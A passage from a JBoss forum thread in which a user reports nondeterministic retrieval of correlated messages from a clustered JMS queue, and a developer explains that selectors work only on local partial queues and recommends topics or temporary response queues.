); MessageProducer producer = session.createProducer( queue ); TextMessage msg = session.createTextMessage(); msg.setJMSCorrelationID( CORRELATION_ID ); producer.send( msg ); producer.close(); session.close(); cnn.close(); ctx.close(); } private Context getContext() throws NamingException { Hashtable<String, String> env = new Hashtable<String, String>(); env.put( Context.INITIAL_CONTEXT_FACTORY, "org.jnp.interfaces.NamingContextFactory" ); env.put( Context.URL_PKG_PREFIXES, "org.jboss.naming" ); env.put( Context.PROVIDER_URL, JNDI_SERVER ); return new InitialContext(env); } }
Note that we are using a QueueBrowser to peek a the queue. I've tried this by consuming from the queue and seen the same behaviour.
When I run the above (having run once with only executing putMessageOnQueue()) I sometimes get a messages back and sometimes don't. It's not deterministic.
Is this a valid way to verfiy the functionality of clustering with message correlation id's?
Has anyone see this sort of behaviour before?
Any comments or suggestions are welcome.
Thanks,
/Daniel
1. Re: Messaging Cluster issueTim Fox Feb 5, 2008 4:08 AM (in response to Daniel Bevenius)
Can you explain your topology in more detail - i.e., where are the clients that put messages on the queue and where are the clients that remove messages from the queue? (It's important to know what node they're on).
Also can you post your message consumer code? Thanks
2. Re: Messaging Cluster issueDaniel Bevenius Feb 5, 2008 4:32 AM (in response to Daniel Bevenius)
Hi Tim,
thanks for your quick response!
The clients that put messages on the queue are Web Services that exist on two nodes in our messaging cluster.
Their responsibility is to send the SOAP message to a queue that our ESB servers listen to.
The ESB service performs it's actions, and one of these is to send a response message to a response queue.
It's a little difficult for me to post the actual code. But the "test" class in my previous post can simulate the behaviour. This can be done with at two node messaging cluster.
Are there any test in the messaging project that I could run against our configuration to verify that we have not incorrectly configured something. The system has been running in production for several month without any warnings or errors. We upgraded to 1.4.0.SP3 right before Christmas.
Thanks,
Daniel
3. Re: Messaging Cluster issueTim Fox Feb 5, 2008 4:38 AM (in response to Daniel Bevenius)
So you have a clustered response queue, and, say two consumers on it on different nodes....
A response message gets posted to the queue. Clearly the response message is destined for a specific consumer, but if you have two consumers on the queue, you can' be sure it gets to the "right" consumer (how would JBM know what is the "right" consumer?).
Clustering will make sure it gets to one of the consumers, but not necessarily the one you expect. Am I missing something here, or misunderstanding what you are trying to achieve?
4. Re: Messaging Cluster issueDaniel Bevenius Feb 5, 2008 5:49 AM (in response to Daniel Bevenius)
Yep, that is correct. The response queue is clustered and we have two consumers listening to that queue.
I'm sorry but I forgot to mention that these consumers are using a message selector (like the example code below). They are using the correlation id to make sure that they only take response messages that correlate to the message they have sent.
I might have misunderstood this but I thought that if I publish a message to a clustered queue and then use a message selector to receive messages from the queue, I would get back the message regardless of where the message phisically exists in the cluster.
Does this make sense?
Regards,
Daniel
5. Re: Messaging Cluster issueTim Fox Feb 6, 2008 5:51 AM (in response to Daniel Bevenius)
In most cases, allowing selectors on a JMS queue is an anti-pattern since it can cause the queue to be scanned frequently - i.e. give poor performance.
Also JMS selectors only work on the *local* queue - i.e. each clustered queue is made up of n local partial queues - one on each node. If your consumer has a selector then that does not determine whether or not messages are pulled to or from that node.
This can result in messages being pulled from one node to another, where they won't be consumed because the selector doesn't match.
Making message redistribution cluster aware would be extremely difficult. Think about it. Imagine messages are pulled to one node based on the selectors on that node, then the consumer changes on that node, and another one starts on another node that matches. We would have to maintain a global view of what selectors were on each node and messages would be shifted en-masse back and forth every time a selector changed!
If you want to do clustered request-response, then you could either
a) Use a *topic* with selectors. (I general if you ever see yourself using selectors with queues it's always a good idea to see if you can refactor to use topics).
b) Use a temporary request/response queue - in this case you don't need selectors since the response queue is only used by you.
6. Re: Messaging Cluster issueDaniel Bevenius Feb 6, 2008 6:07 AM (in response to Daniel Bevenius)
Hi Tim,
thanks for the detailed explaination on this, it is much appreciated!
I'll refactor our code to use temporary queues instead. Is there any perfomance loss compared to using Topics with selectors?
Regards,
Daniel
|
https://developer.jboss.org/thread/128838
|
CC-MAIN-2017-39
|
refinedweb
| 1,195
| 57.77
|
gasparicMembers
Posts12
Joined
Last visited
Posts posted by gasparic
Hello,
I need Python module channels==3.0.4 for Django on Tommy:
Also, I need your help with deploying Django project/app to subdomain chat.codedo.ga
How should I edit .htaccess and dispatch.wsgi files for app to run directly on that subdomain without separate folder?
currently .htaccess:
RewriteEngine On
RewriteBase /
RewriteRule ^(codedoga/dispatch\.wsgi/.*)$ - [L]
RewriteRule ^(.*)$ chat/codedoga/dispatch.wsgi/$1 [QSA,PT,L]
dispatch.wsgi :
"""
WSGI config for chat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
"""
import os, sys
# edit your username below
sys.path.append("/home/gasparic/public_html/chat")
from django.core.wsgi import get_wsgi_application
os.environ['DJANGO_SETTINGS_MODULE'] = 'codedoga.settings'
application = get_wsgi_application()
I'm currently getting 500 Internal server error.
Thank you,
gasparic
Thank you very much
I need help connecting to mySQL database that is on hosting server from my site.
DB connects fine from three different computers and two different sites, but it won't connect from my Django app on my site or using php script on my site, it just gives "Connection timed out"
HelioHost:
user - gasparic
Hostinger MySQL db:
host = 'servername';dbname = 'XXX';username = 'XXXXu';
I added % - any host to allowed hosts to MySQL remote on hPanel on hostinger and I also added address 65.19.143.6 which was shared IP address for my site at the moment.
I made special user for Django so that I can share Django debug report if it will help - I'm willing to send it via email or private message.
Thank you in advance
Johnny and Tommy have different python modules installed. We just start with nothing and install stuff as people request it. Have you checked your modules against Tommy's installed list? Go through this list and see if anything you're trying to import are missing. If anything is missing let me know and I can install it.
You are right, I need pymysql which is available on Johnny, but not on Tommy.
Can you install it?
Thank you
Hello,
after moving to Tommy, I get this error when trying to access my Django application:
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator at webmaster@dominik.codedo.
link is dominik.codedo.ga/kuhinja210/
heliohost-user: gasparic
It was working on Johnny so I suspect Apache, but could be something else. Please help.
Thank You
Please move to Tommy
User: gasparic
Transaction: 1A760563PR761515C
Thank You
thank you very much
thank you very much
It is working since I added the domain docode.ga. But decode.ga is still primary, which isn't my domain (I don't own it).
Slika zaslona 2021-04-24 u 16.07.15.png
I need remote access to Postgres for any IP for users gasparic_db1select, gasparic_db1user and gasparic_db1sudo for my database gasparic_db1
Thank you
So Long and Thanks for all the Fish
in News
Posted
I would also consider SPanel and aaPanel.
Since this is large community of happy users, I believe everyone would consider helping and contributing both with their knowledge and financially to "save" HelioHost and make it even better than it was before.
Thanks guys for everything so far. I really hope that this is not the end.
|
https://www.helionet.org/index/profile/206448-gasparic/content/?type=forums_topic_post&change_section=1
|
CC-MAIN-2022-40
|
refinedweb
| 561
| 56.76
|
Opened 12 years ago
Closed 11 years ago
Last modified 11 years ago
#4658 defect closed invalid (invalid)
twisted.internet.gtk2reactor conflicts with subprocess.Popen
Description
I'm using Linux 64bit, Python 2.6.5, pygtk 2.22.0 and twisted 10.0.0. When I'm running the following script, one of the two CPUs will go 100% after subprocess returns(after 5 seconds).
#!/usr/bin/python #import gtk from twisted.internet import gtk2reactor gtk2reactor.install() from twisted.internet import reactor import subprocess subprocess.Popen(['sleep', '5']) #gtk.main() reactor.run()
If I use gtk.main() instead of reactor.run(), there will be no problem, so I wonder if it is a bug of twisted?
Change History (24)
comment:1 Changed 12 years ago by
comment:2 Changed 12 years ago by
Nor on Linux/64-bit, Python 2.6.5, pygtk 2.17.0, gtk 2.20.1, Twisted 10.0.0
comment:3 Changed 12 years ago by
comment:4 Changed 12 years ago by
The first release of Twisted which claims to be compatible with the subprocess module at all is 10.1. So perhaps this is invalid. Please try with 10.1 or later and report the results. Also, if you still have a problem on 10.1 or later, please add these lines to the beginning of your example and report the extra output:
from twisted.python.log import startLogging from sys import stdout startLogging(stdout)
Also, there's #4286, but it should only matter when running on Python 2.5.
comment:5 Changed 12 years ago by
comment:6 Changed 12 years ago by
Thing goes the same on 10.1, Ubuntu 10.10 32bit, pygtk 2.21.0, gtk 2.22.0. Here is the log: 2010-10-05 14:45:37+0800 [-] Log opened. 2010-10-05 14:45:37+0800 [-] using set_wakeup_fd C2010-10-05 14:45:54+0800 [-] Received SIGINT, shutting down.
comment:7 Changed 12 years ago by
I tried to reproduce this in a 32bit Ubuntu 10.04 VM and wasn't able to.
comment:8 Changed 12 years ago by
can't reproduce it on osx 10.5.8 with python2.5 and twisted 10.1 either.
>>> gtk.gtk_version (2, 14, 8) >>> gtk.pygtk_version (2, 15, 0)
comment:9 Changed 12 years ago by
I've reproduced it on Ubuntu 10.10 64-bit on another machine, maybe it's a problem with the newer version softwares? I'll try 10.04 later.
comment:10 Changed 12 years ago by
I can't reproduce it on Ubuntu 10.04 on the same machine. I think you should reproduce it on newer pygtk and gtk. Ubuntu 10.10 is on the way.
comment:11 Changed 11 years ago by
comment:12 Changed 11 years ago by
I've just fired the test-case above (rather than the one in #4829) and I can reproduce this 100% on both the latest Fedora (14) and Ubuntu (10.10), and probably most other distros too.
Any suggestions for a workaround would be much appreciated. At the moment I get lots of user complaints of the form: "your application is buggy/crap" because of this.
comment:13 Changed 11 years ago by
Here's an strace of the demo after it starts hogging the CPU:
poll([{fd=5, events=POLLIN}, {fd=8, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 4, 29) = 1 ([{fd=7, revents=POLLIN}]) read(7, 0, 1) = -1 EFAULT (Bad address) gettimeofday({1296137620, 466729}, NULL) = 0 read(8, 0x8fcc438, 4096) = -1 EAGAIN (Resource temporarily unavailable) gettimeofday({1296137620, 466835}, NULL) = 0
This happens in a perpetual loop.
The
EFAULT on fd 7 looks pretty suspect, but it's also not clear why the process keeps trying to read from fd 8.
So, I don't really know what's going on here. It still looks like a gtk2 bug to me, though.
comment:14 Changed 11 years ago by
I've collected similar straces before.
Aren't those fds the stdin and/or stdout of the subprocess? And since that's terminated... there's nothing there, right?
If I wrap Popen, wouldn't it be possible to force the reactor (gtk in this case) to stop polling on those (closed?) fds somehow?
comment:15 Changed 11 years ago by
I don't think so. The way
Popen is used in this example, the child stdio is inherited directly from the parent. It doesn't pass through the parent process at all, and nothing in the reactor monitors it.
7 is created by a
pipe call. 8 created by a
socket(PF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_TCP) call and then connected to localhost port 6010... ie, X11.
comment:16 Changed 11 years ago by
If it helps at all,
reactor.run(installSignalHandlers=False) appears to eliminate the CPU issue. Of course, this breaks
reactor.spawnProcess, but if you're using
Popen then it's possible you don't care much about that.
This workaround suggests it's an interaction between Twisted's signal handling and glib/gtk/pygtk's signal handling that causes the problem.
comment:17 Changed 11 years ago by
Actually, I am using
reactor.spawnProcess... so that doesn't help me :(
FYI: I've created a bug on gnome's bugzilla: bug 640738 (which also points back here)
comment:18 Changed 11 years ago by
I've just tried and it looks like my problem is finally solved! (no CPU usage) - simply by using your suggestion:
reactor.run(installSignalHandlers=False) - thank you so much!
In what way does it break
reactor.spawnProcess?
All the calls to
reactor.spawnProcess seem to work as expected... so far.
I won't be rushing a bugfix release out just yet, but this looks promising.
comment:19 Changed 11 years ago by
In what way does it break reactor.spawnProcess?
Without a SIGCHLD handler installed, Twisted won't notice when child processes exit, and won't reap them. They'll remain zombies and the
ProcessProtocol.processEnded and
ProcessProtocol.processExited callbacks will never be invoked.
comment:20 Changed 11 years ago by
This code from pygtk probably has something to do with the bug:
#ifdef HAVE_PYSIGNAL_SETWAKEUPFD PySignalWatchSource *real_source = (PySignalWatchSource *)source; GPollFD *poll_fd = &real_source->fd; int data_size = 0; if (poll_fd->revents & G_IO_IN) data_size = read(poll_fd->fd, 0, 1); #endif
I don't know of any way that
read(poll_fd->fd, 0, 1) could ever do anything except fail with
EINVAL. There is also no error checking after this call, so no one ever notices the read fails. This is from
pygtk_main_watch_check.
comment:21 Changed 11 years ago by
They'll remain zombies
That would be a major problem for me, but strangely enough that is not what I am seeing. When the child terminates, I get a nice:
twisted.internet.error.ProcessDone A process has ended without apparent errors: process finished with exit code 0.
My code is a bit more complex as it extends the
protocol.ProcessProtocol via a
HiddenSpawnedProcess wrapper (to workaround the shell window popup issue on win32), but eventually it ends up calling
reactor.spawnProcess from the
HiddenSpawnedProcess.startProcess override function...
And you're saying that this should not work properly since I run it with
reactor.run(installSignalHandlers=False)? But it does.. How odd!
I'll post your findings to gnome.org as I think they should at least comment on that.
comment:22 Changed 11 years ago by
That would be a major problem for me, but strangely enough that is not what I am seeing.
I suppose that means
installSignalHandlers=False is broken right now and isn't actually preventing the signal handler from being installed. I don't know what it is doing, then, that it manages to fix this behavior.
comment:23 Changed 11 years ago by
The pygtk patch you posted works for me, so I am closing this bug as invalid since there's nothing wrong with twisted.(the strange
installSignalHandlers=False behaviour is a separate issue)
Thanks again for everything!
comment:24 Changed 11 years ago by
The upstream bug report has been closed as fixed.
FWIW, this doesn't happen here with Linux/32-bit, Python 2.6.5, pygtk 2.17.0, gtk 2.20.1, Twisted 10.0.0
|
https://twistedmatrix.com/trac/ticket/4658
|
CC-MAIN-2022-21
|
refinedweb
| 1,381
| 68.47
|
Contents
What is static site generation?
Just like the word static, it means not changing. 🧘♂️
Benefits include:
- Better SEO 🕶
- Performance 🚀
- Can be hosted in CDN 🌍
- Doesn't need to have JavaScript to run (mostly HTML) ⚙️
- Very fewer things to parse from server to client 🌬
So why do we need a static site?
Let's take an example of a landing page for a company, a landing page doesn't need any type of dynamic content such as pulling data from different API's and showing it according to their users.
A user who accesses a landing page of a company needs to see what that company is about, its main feature, achievements, etc, which are all static things.
The second example is this blog, this blog is statically generated from markdown files. Its main purpose is to provide information to you. It doesn't change or pull data from different APIs.
Dynamic sites include websites like Facebook, Twitter, etc, which changes content according to their users.
So let's dive in! 🏊♀️
Static site generation in nextjs
To make better use of Static site generation in Nextjs, let's understand
getStaticProps() function.
Using the
getStaticProps() function:
This function is added to a Nextjs
page so that it fetches data at build time.
First of all, let's make a simple Nextjs page called
todos.js inside our
pages folder.
// Todos.js Page const Todos = () => { return <h1>Todos</h1>; }; export default Todos;
let's add the
getStaticProps() function.
const Todos = () => { return <h1>Todos</h1>; }; export default Todos; // add getStaticProps() function export async function getStaticProps() {}
The
getStaticProps() function gives props needed for the component
Todos to render things when Nextjs builds the page.
Note that we added the
async keyword, this is needed so that Nextjs knows to prerender our
Todos page at build time.
let's write some code inside the
getStaticProps() function.
const Todos = () => { . . . // add getStaticProps() function export async function getStaticProps(){ // Get todo list from an API // or from anything like a JSON file etc. const todos = await fetch(''); return { props: { todos } } }
- We can get our todo list data from an API endpoint or anything like JSON file etc.
- We should return the
todosarray within the
propsobject like this
return { props: { todos, }, };
Now let's complete our
Todos render code.
const Todos = ({ todos }) => { // render code return ( <div> <h1>Todos</h1> <ul> {todos.length > 0 ? todos.map((todo) => <li>{todo}</li>) : "No todos"} </ul> </div> ); }; export default Todos; // add getStaticProps() function export async function getStaticProps() { // Get todo list from an API const todos = await fetch(""); return { props: { todos, }, }; }
Let's break down our render logic.
// render code return ( <div> <h1>Todos</h1> <ul> {todos.length > 0 ? todos.map((todo) => <li>{todo}</li>) : "No todos"} </ul> </div> );
We are just mapping over our
todos array we received as a
prop and rendering each
todo from the array inside an unordered list using the
map() function in JavaScript.
The
todos prop is returned from
getStaticProps() function.
Now if you inspect element your webpage, you can see this:
Wonderful! You just made your page static 🤓.
This helps in SEO.
Discussion (4)
Hi, I recently started learning Next and I was a little confused about getStaticProps() but your article helped me. Thanks 😄
Glad it helped you 😀 @Shubh
Wonderful dude, thx
Thanks Ahmed 😀
|
https://practicaldev-herokuapp-com.global.ssl.fastly.net/melvin2016/static-site-generation-in-nextjs-using-getstaticprops-function-ma3
|
CC-MAIN-2021-43
|
refinedweb
| 546
| 63.09
|
OpenResty::Spec::Overview - Overview of the OpenResty service platform
OpenResty is a general-purpose RESTful web service platform for web applications. It provides the following important functionalities for a common nontrivial web app:
This section just gives a conceptual overview for the REST API probably with some samples. For detailed spec for the various REST request syntax, see OpenResty::CheatSheet and OpenResty::Spec::REST.
An openresty server typically distributes its data in terms of accounts, especially when the backend is a database cluster. An account is an atomic namespace for other OpenResty first-class objects like models and views. (In the current Pg and PgFarm backends, accounts are actually implemented by Pg schemas.) These objects are shared in the same account and different accounts can have different models, views, actions, and etc. with the same names.
Operations like creating and removing accounts are not part of the OpenResty web service API. Basically the sysadmin uses the following command to create an account on his server terminal:
$ bin/openresty adduser marry
and a similar command to remove one:
$ bin/openresty deluser marry
Multiple users can share the same set of objects in an account by logging in as different roles. And fine-grained access control can be achieved by specifying different sets of ACL rules for each role.
Every OpenResty account has two builtin roles throughout its lifetime:
Admin and
Public.
The
Admin role always owns the most privileges and its properties and ACL rule set are always read only.
Public role is always anonymous but its ACL rule set can be modified by a role with enough privileges.
An OpenResty role with access to the Role API (such as
Admin) can create new roles, remove existing roles (except the two builtin roles explained above, of course), and modify the properties and ACL rules of other roles or even itself. For instance, to allow the
Public role to perform the request
GET /=/model/Post/id/<some number> under the same account, the
Admin role could insert a corresponding access rule to the
Public role's ACL rule set, like this:
POST /=/role/Public/~/~ HTTP/1.0 Content-Type: text/json Content-Length: 45 {"method":"GET", "url":"/=/model/Post/id/~"}
The JSON structure in the POST content specifies an ACL rule. The tild (
~) character in the
url value serves as a wildcard which matches "anything". So both
GET /=/model/Post/id/1 and
GET /=/model/Post/id/231 are allowed to be performed by the
Public role.
Interestingly it's also possible to grant the
Public role privileges to augment its own ACL rule set in a similar way:
POST /=/role/Public/~/~ HTTP/1.0 Content-Type: text/json Content-Length: 46 {"method":"POST", "url":"/=/role/Public/~/~"}
Every user accessing an OpenResty server must specify both its account name and its role name unless he or she has already logged in and got a session ID. For example, a typical HTTP request may look like this:
GET /=/model/Post/id/3?_user=agentzh.Public HTTP/1.0
In the above example, the
_user parameter has the value
agentzh.Public where
agentzh is the account name and
Public the role name. In addition, the
Public role is an anonymous role, or a
_password or a
_captcha parameter would be required here as well. This authentication method is called "per-request login".
Alternatively, the user can login with his user name and MD5'd password first so as to obtain a session ID which can be used for subsequence requests. For example:
GET /=/login/agentzh.Admin/5f4dcc3b5aa765d61d8327deb882cf99 HTTP/1.0
will yield an HTTP response from the OpenResty server like this:
HTTP/1.0 200 OK Connection: close Content-Type: text/json; charset=UTF-8 Content-Length: 133 Date: Mon, 21 Apr 2008 11:51:49 GMT { "success": 1, "session": "535F265E-0F99-11DD-B185-1A3EB9E8D9B0", "account": "agentzh","role":"Admin" }
And subsequent requests can be made by using the resulting session ID:
GET /=/model/Post/id/3?_session=535F265E-0F99-11DD-B185-1A3EB9E8D9B0
For convenience, the sample HTTP requests given throughout this document will not specify the
_user nor the
_session parameter explicitly.
It's worth mentioning that the simple MD5 treatment of passwords in the current implementation is merely a hack and will be changed in the near future. It's highly recommended to use SSL for the password login method for any serious uses.
An OpenResty model is just an abstract concept of tables found in common relational databases. An instance of an OpenResty model could be a blog post:
{ "description":"Blog post", "columns": [ { "name":"title", "label":"Post title", "type":"text" }, { "name":"content", "label":"Post content", "type":"text" }, { "name":"author", "label":"Post author", "type":"text" }, { "name":"created", "default":["now()"], "type":"timestamp (0) with time zone", "label":"Post creation time" }, { "name":"comments", "label":"Number of comments", "type":"integer", "default":0 } ], }
This is approximately the
Post model used in my personal blog site. The rough SQL equivalence could be as follows:
create table "Post" ( title text, content text, author text, created timestamp (0) with time zone default now(), comments integer default 0 )
Although the data storage backend may be truly implmented this way, the column types and names that can be used here are well defined and reasonably limited.
After creating a model, one can insert data via an HTTP POST request:
POST /=/model/Post/~/~ HTTP/1.0 Content-Type: text/json Content-Length: 111 { "title":"My first post", "content":"Blah blah blah...", "author":"Agent Zhang" }
Multiple rows can be inserted at a time as well, but there's a limit.
The model API not only offers interfaces to perform CRUD operations on models, columns, and rows, but also gives some simple but still powerful query functionalities. Here's an example:
GET /=/model/Post/author/agentzh?_order_by=created:desc&_count=10 HTTP/1.0
which is roughly equivalent to the following standard SQL query:
select * from "Post" where "author" = 'agentzh' order by created desc count 10
To address the problem of extending the limited data query interface provided by the model API, OpenResty integrates a view system in which the user can define reusable SQL-like queries by means of the RestyScript language. Here is an example:
POST /=/view/~ HTTP/1.0 Content-Type: text/json Content-Length: 312 { "name": "CommentsToAuthor", "description": "Recent comments for the blog", "definition": " select Comment.sender as guest, Comment.body as comment_body from Comment, Post where Comment.id = Post.id and Post.author = $author" }
In this sample, the string literal for the
definition slot has been splitted into multiple lines for readability. The RestyScript language for views is just a (non-strict) subset of the standard SQL language, thus giving powerful strucutred query capability to the user, which is often a missing feature in those highly-distributed and semi-structured data storage solutions like CouchDB and SimpleDB.
Unlike SQL, however, the view definition can take one or more parameters (or named place-holders) which are required to feed values while invoking the view (unless they have a default value):
GET /=/view/CommentsToAuthor/author/agentzh
Or equivalently
GET /=/view/CommentsToAuthor/~/~?author=agentzh
The HTTP response from the OpenResty server might be
HTTP/1.0 200 OK Connection: close Content-Type: text/json; charset=UTF-8 Content-Length: 187 Date: Mon, 21 Apr 2008 12:42:15 GMT [ {"guest":"laser","comment_body":"super cool!"}, {"guest":"carriezh","comment_body":"hello?hello?"}, {"guest":"agentzh":"comment_body":"Thanks for commenting!"} ]
OpenResty offers the feed objects which can be used to map OpenResty views to RSS 2.0 feeds. For instance, the OpenResty feed object for my blog posts looks like this:
{ "description": "Feed for blog posts", "author": "agentzh", "copyright": "Copyright 2008 by Yahoo! China EEEE Works", "language": "zh-cn", "title": "Posts for Human & Machine", "link": "", "logo": "", "view": "PostFeed" }
and the
PostFeed view used to generate this feed has the following definition:
{ "description":"View for post feed", "definition": " select author, title, '-' || id as link, content, created as published, '-' || id || ':comments' as comments from Post order by created desc limit $count | 20 " }
Here the
PostFeed view takes one optional parameter
$count (with the default value
20), which controls the number of resulting rows returned.
Not every view can be used to drive feed generation. The resulting rows of the view must have the columns that make sense to the feed, like
author,
title,
link,
content,
published, and
After creating the
Post feed in my
agentzh account, one can subscribe to the feed by the following GET request:
GET /=/feed/Post/~/~ HTTP/1.0
Check to see what the actual response looks like.
One nice thing about the feed object is that it can forward arguments to the view that drives it:
GET /=/feed/Post/count/100 HTTP/1.0
This will produce the RSS 2.0 feed for the last 100 post entries rather than the default 20, giving more options to my blog readers.
An openresty action is a bunch of RestyScript commands with a name attached to it. Such a command can be either a SQL-like statement or an HTTP-like command.
An example for SQL-like commands could be
update Post set comments = comments + 1 where id = $post_id
In this
update command,
Post is the name of an OpenResty model (assuming it's already there),
$post_id is a parameter for the whole action (similar to parameters for views).
An instance of HTTP-like commands could be
POST '/=/model/Comment/~/~' { "sender": $sender, "body": $body, "post": $post_id }
Here the part is omitted in the POST URL, so it's default to the current OpenResty server being requested. If a full URL is specified here, one can do some really cool things by invoking the resources of some other OpenResty server.
Similarly, for the SQL-like command such as:
delete from Comment where post = $post_id and sender = $spammer
[TODO: a optional
run on clause might be specified to run "SQL" on remote OpenResty servers if permitted.]
Furthermore, we can put multiple RestyScript commands together using the
; separator to define a full action object:
{ "name": "PostComment", "description": "Action for posting a comment", "parameters":[ {"name":"post_id","label":"Post ID","type":"literal"}, {"name":"sender","label":"Sender","type":"literal","default":"agentzh"}, {"name":"body","label":"Body","type":"literal"} ], "definition": " update Post set comments = comments + 1 where id = $post_id; POST '/=/model/Comment/~/~' { "sender": $sender, "body": $body, "post": $post_id } " }
We still split the definition string into multiple lines for readability. The
PostComment action defined here takes 3 parameters, i.e.
$post_id,
$sender, and
$body.
One can invoke the
PostComment action like this:
GET /=/action/PostComment/~/~?post_id=3&sender=marry&body=Haha HTTP/1.0
The server response would be an array of results for each command. If any of the commands fails, the whole action would fail. Even preious successfully executed commands would get rolled back. That is, actions always run in a transaction.
With actions the user can encapsulate multiple OpenResty REST requests as well as SQL-like
update and
delete statements as a whole and reuse as many times as he wishes. Such atomicity would be very useful in the context of captcha authentication. (See the "Captchas" section for more information.)
More interestingly it would be possilbe to call other actions or views in an action, or even call the action itself (i.e. recursive calling). Special constraints would be imposed on the length of the action call chain though. There would also be some limit regarding the total number of commands grouped in an action.
Captchas are just another way to do "per-request login" in addition to the
anonymous and
password login methods.
Captcha support must be associated with some user-defined role whose "login" attribute is set to the value "
captcha", like this:
POST /=/role/CommentPoster HTTP/1.0 Content-Type: text/json Content-Length: 64 {"description":"Role for posting comments","login":"captcha"}
Therefore, it's not hard to see that it's not possible to do captchas with roles like
Public or
Admin.
Then we should grant priviledges to the operations that need to performed by solving a capthca challenge for the
CommentPoster role:
POST /=/role/CommentPoster/~/~ HTTP/1.0 Content-Type: text/json Content-Length: 48 {"method":"POST","url":"/=/model/Comment/~/~"}
Then the clients (like the JavaScript code in a web page) could do the following:
GET /=/captcha/idto obtain a captcha ID from the OpenResty server.
B44572D0-1038-11DD-B185-1A3EB9E8D9B0, to fetch the catpcha image:
GET /=/captcha/id/B44572D0-1038-11DD-B185-1A3EB9E8D9B0 HTTP/1.0
POST /=/model/Comment/~/~?_user=agentzh.CommentPoster\ &_captcha=B44572D0-1038-11DD-B185-1A3EB9E8D9B0:pretty%20cat \ HTTP/1.0 Content-Type: text/json Content-Length: 52 {"sender":"agentzh","body":"Good post!","post":25}
If the user solution
pretty cat (i.e. "
pretty%20cat") provided in the
captcha URL parameter is incorrect, the server would reject the whole POST operation.
The OpenResty server opens a special door to the JavaScript code in a web page coming from other domains, so as to allow REST requests get directly initiated from the end user's web browser.
For GET requests, it's the common practice to do cross-domain AJAX requests via dynamically created
<script> tags. To help the page owner do this trick with an OpenResty server, the special
_callback URL parameter is supported to make the server returning JSON data wrapped by
some_callback_func( and
);. For example, the request
GET /=/view/RecentPosts/~/~?_user=agentzh.Public&_callback=foo HTTP/1.0
yields something like this
HTTP/1.0 200 OK Connection: close Content-Type: application/x-javascript; charset=UTF-8 Content-Length: 74 Date: Mon, 21 Apr 2008 12:42:15 GMT foo( [ {"title":"My first post","id":1}, {"title":"My second one","id":2} ] );
Note the extra stuff
foo(...) around the JSON data.
POST, PUT, and DELETE requests all have their GET variations:
GET /=/post/... GET /=/put/... GET /=/delete/...
where
... is the normal stuff in
PUT /=/..., and
DELETE /=/..., respectively. Some people might be nervous about GET requests doing data modification but I can't think of a better way.
Cookies for authentication should always be excluded due to the risk of XSS attacks.
To overcome the length limit of URLs, cross-site POST interface is also supported. Basically the user could use an HTML form in his web page like below:
<form action="/=/model/Comment/~/~?_last_response=69bc45ec71ca7dc83cc" method="POST" onclick="onPostComment()" target="myHiddenFrame"> <input type="hidden" name="data" value="{some JSON goes here...}"> </form> <iframe id="myHiddenFrame" style="display: none"></iframe>
and the browser may initiate a POST request when submitting this form:
POST /=/model/Comment/~/~?_last_response=69bc45ec71ca7dc83cc HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 23 data={some JSON goes here...}
which is functionally equivalent to
POST /=/model/Comment/~/~ Content-Type: text/json Content-Length: 23 {some JSON goes here...}
with the exception that the OpenResty serser would save the response of the current POST request and allow the user to retrieve it later (using the same
_last_response key):
GET /=/last/response/69bc45ec71ca7dc83cc
Note that the
_last_response key
69bc45ec71ca7dc83cc used here should be randomly selected and globally unique enough.
The "last response" stuff is essential for the web page client to obtain the response of its POST request because there's no (known) way for the JavaScript code to directly "look" into the target frame (i.e. the
myHiddenFrame iframe in the above sample) belonging to the OpenResty server's domain.
As you might have already noticed, two HTTP round-trips are required to do a true POST, which is a bit expensive. We'll use the cross-site cookies (as well as p3p headers for IE) to deliver the response of POSTs to the JavaScript initiator.
In theory, any programming languages or tools with basic HTTP 1.0/1.1 support would have access to 100% of the OpenResty services.
But to make things even easier, there are currently two ad-hoc OpenResty client library for JavaScript and Perl:
See.
See the WWW::OpenResty module on CPAN. Most of the time one would just use its subclass WWW::OpenResty::Simple which is much more handy IMHO ;)
Most of the sample apps' source code can be found at.
Agent Zhang
<agentzh@yahoo.cn>
Copyright (c) 2008 Yahoo! China EEEE Works, Alibaba::REST_cn, OpenResty, OpenResty::CheatSheet.
|
http://search.cpan.org/dist/OpenResty/lib/OpenResty/Spec/Overview.pod
|
CC-MAIN-2014-52
|
refinedweb
| 2,695
| 52.09
|
Ambiguous Controller Names With Areas
Note: This describes the behavior of ASP.NET MVC 2 as of the release candidate. It’s possible things might change for the RTM.
When using areas in ASP.NET MVC 2, a common problem you might encounter is this exception message.
The controller name ‘Home’ is ambiguous between the following types:
AreasDemoWeb.Controllers.HomeController
AreasDemoWeb.Areas.Blogs.Controllers.HomeController
This message is telling you that the controller factory found two types that match the route data for the current request. Typically this happens when you have a controller of the same name in an area and in the main project.
For example, in the screenshot below, notice that we have a
HomeController in the main Controllers folder as well as in the
Blogs area.
If you make a request for the area such as /Blogs/Home, you’ll find that everything works hunky-dory. However, if you make a request for the root HomeController, such as /Home, you’ll get the ambiguous controller exception.
Why is that?
When you register routes for an area, they get a namespace associated with each route. That ensures that only controllers within the namespace associated with that area can fulfill the request. Thus the request that matches an area will have that namespace and the namespace is used to disambiguate controllers.
But by default, the routes in the main application don’t have a namespace associated with them. That means the controller factory will scan all types looking for a match, and in this case finding two types which match the controller name “Home”.
The Fix
There are two very simple workarounds. The simplest falls in the “If it hurts, stop doing that” camp which is to simply avoid naming two controllers the same name.
For many situations, this is not a satisfactory answer. The other workaround, as you might guess from my explanation of why this happens, is to give the route in the main application a specific namespace. Here’s an example of the default route in Global.asax.cs which has the fix.
public static void RegisterRoutes(RouteCollection routes) { routes.IgnoreRoute("{resource}.axd/{*pathInfo}"); routes.MapRoute( "Default", // Route name "{controller}/{action}/{id}", // URL new { controller = "Home", action = "Index", id = "" }, // Defaults new[]{"AreasDemoWeb.Controllers"} // Namespaces ); }
In the code above, I added a fourth parameter which is an array of
namespaces. The controllers for my project live in a namespace called
AreasDemoWeb.Controllers.
Follow Up
In a follow-up post, I’ll walk through more details about areas and how namespaces play into routing and controller lookup. For now, I hope this gets you unstuck if you’ve run into this problem before.
22 responses
|
http://haacked.com/archive/2010/01/11/ambiguous-controller-names.aspx/
|
CC-MAIN-2021-31
|
refinedweb
| 448
| 65.32
|
